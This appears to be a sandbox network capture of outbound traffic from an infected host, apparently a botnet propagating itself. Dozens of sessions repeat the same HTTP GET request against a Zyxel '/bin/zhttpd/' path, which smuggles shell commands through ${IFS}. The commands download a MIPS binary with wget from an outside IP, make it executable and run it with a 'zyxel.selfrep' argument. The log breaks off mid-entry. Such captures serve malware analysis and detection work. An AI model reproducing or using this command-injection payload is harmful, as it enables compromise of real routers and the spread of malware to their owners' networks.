                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3685192.168.2.2359828111.36.150.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386230946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3686192.168.2.235411263.254.234.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386267900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3687192.168.2.2335064133.117.138.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386311054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3688192.168.2.235954849.137.172.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386353970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3689192.168.2.234173217.253.172.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386383057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3690192.168.2.233622495.16.195.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386431932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3691192.168.2.2354648222.126.238.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386461020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3692192.168.2.2351894114.26.184.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386506081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3693192.168.2.2359690109.28.34.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386543036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3694192.168.2.2352918145.127.100.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386581898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3695192.168.2.2352246149.74.29.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386630058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3696192.168.2.2346258217.155.240.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386653900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3697192.168.2.2353404125.140.140.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386715889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3698192.168.2.234603271.18.47.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386751890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3699192.168.2.2335336183.222.33.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386790991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3700192.168.2.2356284112.143.56.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386806965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3701192.168.2.2338862155.226.162.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386857033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3702192.168.2.2336276223.18.141.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386897087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3703192.168.2.234929697.110.110.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386917114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3704192.168.2.2347576151.45.245.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386965990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3705192.168.2.2353016166.1.98.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.386996984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3706192.168.2.235373817.158.9.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387065887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3707192.168.2.233844470.182.198.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387068987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3708192.168.2.2354748190.125.121.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387113094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3709192.168.2.2339402154.110.133.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387159109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3710192.168.2.235999862.152.149.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387204885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3711192.168.2.2333346128.85.133.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387238026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3712192.168.2.235726632.102.210.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387275934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3713192.168.2.2353812123.109.138.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387351990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3714192.168.2.2334780145.48.222.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387372971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3715192.168.2.235585448.74.189.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387414932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3716192.168.2.233546039.131.169.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387465954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3717192.168.2.2350192129.88.223.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387505054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3718192.168.2.233969861.158.99.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387543917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3719192.168.2.235131491.218.130.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387573957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3720192.168.2.235615677.139.145.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387614965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3721192.168.2.2345978209.136.18.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387665987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3722192.168.2.2352102146.52.149.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387712002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3723192.168.2.234041261.140.98.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387742043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3724192.168.2.235804862.54.225.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387768984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3725192.168.2.235614284.254.195.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387811899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3726192.168.2.2344206205.227.158.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387880087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3727192.168.2.234186057.144.100.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387882948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3728192.168.2.234997238.80.59.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387933969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3729192.168.2.2354568184.35.38.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.387974977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3730192.168.2.234906446.124.144.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388031006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3731192.168.2.234102890.201.222.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388058901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3732192.168.2.2334050184.29.244.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388099909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3733192.168.2.2352324132.162.75.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388142109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3734192.168.2.234748013.219.193.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388174057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3735192.168.2.2341014101.151.114.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388215065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3736192.168.2.2336466216.46.151.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388269901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3737192.168.2.236042058.194.174.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388295889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3738192.168.2.235052439.168.39.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388320923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3739192.168.2.233701457.254.138.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388386011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3740192.168.2.234809488.132.65.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388408899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3741192.168.2.2339760209.31.88.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388447046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3742192.168.2.234078672.200.171.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388478994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3743192.168.2.234184249.101.87.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388529062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3744192.168.2.2341582108.30.49.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388550997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3745192.168.2.2354618166.48.31.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388597012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3746192.168.2.2349538218.166.84.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388655901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3747192.168.2.235889699.224.164.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.388695002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3748192.168.2.2356750116.213.190.95443
                                                TimestampBytes transferredDirectionData
